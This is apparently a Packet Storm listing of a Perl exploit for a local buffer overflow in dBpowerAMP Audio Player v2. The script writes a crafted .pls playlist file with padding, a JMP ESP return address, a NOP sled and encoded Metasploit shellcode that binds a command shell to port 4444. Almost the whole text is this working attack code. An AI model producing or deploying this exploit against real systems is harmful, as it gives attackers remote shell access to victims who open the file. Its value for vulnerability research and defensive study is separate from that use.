dBpowerAMP Audio Player version 2 local buffer overflow exploit that generates a malicious .pls file that will bind a shell to port 4444.
7b61fef3bf02e8083f6897916f1b3e757353da051d32f656f85b73fd20ff1a58# dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit
# Exploited By AlpHaNiX
# From NullArea.Net
# Thanks Stack For The PoC
system("cls") ;
print "\n\n\n[+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit" ;
my $blah= "\x41" x 600;
my $nop = "\x90" x 52 ;
my $ret = "\xC7\xEB\xFA\x75" ; # 77C80F1A JMP ESP [ntdll v6.0 vista en ultimate]
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50".
"\x80\x56\xea\x83\xeb\xfc\xe2\xf4\xac\xea\xbd\xa7\xb8\x79\xa9\x15".
"\xaf\xe0\xdd\x86\x74\xa4\xdd\xaf\x6c\x0b\x2a\xef\x28\x81\xb9\x61".
"\x1f\x98\xdd\xb5\x70\x81\xbd\xa3\xdb\xb4\xdd\xeb\xbe\xb1\x96\x73".
"\xfc\x04\x96\x9e\x57\x41\x9c\xe7\x51\x42\xbd\x1e\x6b\xd4\x72\xc2".
"\x25\x65\xdd\xb5\x74\x81\xbd\x8c\xdb\x8c\x1d\x61\x0f\x9c\x57\x01".
"\x53\xac\xdd\x63\x3c\xa4\x4a\x8b\x93\xb1\x8d\x8e\xdb\xc3\x66\x61".
"\x10\x8c\xdd\x9a\x4c\x2d\xdd\xaa\x58\xde\x3e\x64\x1e\x8e\xba\xba".
"\xaf\x56\x30\xb9\x36\xe8\x65\xd8\x38\xf7\x25\xd8\x0f\xd4\xa9\x3a".
"\x38\x4b\xbb\x16\x6b\xd0\xa9\x3c\x0f\x09\xb3\x8c\xd1\x6d\x5e\xe8".
"\x05\xea\x54\x15\x80\xe8\x8f\xe3\xa5\x2d\x01\x15\x86\xd3\x05\xb9".
"\x03\xd3\x15\xb9\x13\xd3\xa9\x3a\x36\xe8\x47\xb6\x36\xd3\xdf\x0b".
"\xc5\xe8\xf2\xf0\x20\x47\x01\x15\x86\xea\x46\xbb\x05\x7f\x86\x82".
"\xf4\x2d\x78\x03\x07\x7f\x80\xb9\x05\x7f\x86\x82\xb5\xc9\xd0\xa3".
"\x07\x7f\x80\xba\x04\xd4\x03\x15\x80\x13\x3e\x0d\x29\x46\x2f\xbd".
"\xaf\x56\x03\x15\x80\xe6\x3c\x8e\x36\xe8\x35\x87\xd9\x65\x3c\xba".
"\x09\xa9\x9a\x63\xb7\xea\x12\x63\xb2\xb1\x96\x19\xfa\x7e\x14\xc7".
"\xae\xc2\x7a\x79\xdd\xfa\x6e\x41\xfb\x2b\x3e\x98\xae\x33\x40\x15".
"\x25\xc4\xa9\x3c\x0b\xd7\x04\xbb\x01\xd1\x3c\xeb\x01\xd1\x03\xbb".
"\xaf\x50\x3e\x47\x89\x85\x98\xb9\xaf\x56\x3c\x15\xaf\xb7\xa9\x3a".
"\xdb\xd7\xaa\x69\x94\xe4\xa9\x3c\x02\x7f\x86\x82\xa0\x0a\x52\xb5".
"\x03\x7f\x80\x15\x80\x80\x56\xea";
my $buff = $blah.$ret.$nop.$shellcode ;
open(pls, "> alp1x.pls");
my $plsfile = '[playlist]'."\r\n".
'NumberOfEntries=1'."\r\n".
"File1=http://".$buff ;
print pls $plsfile ;
close (pls);
print "\n[!] File Creation Done !";
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed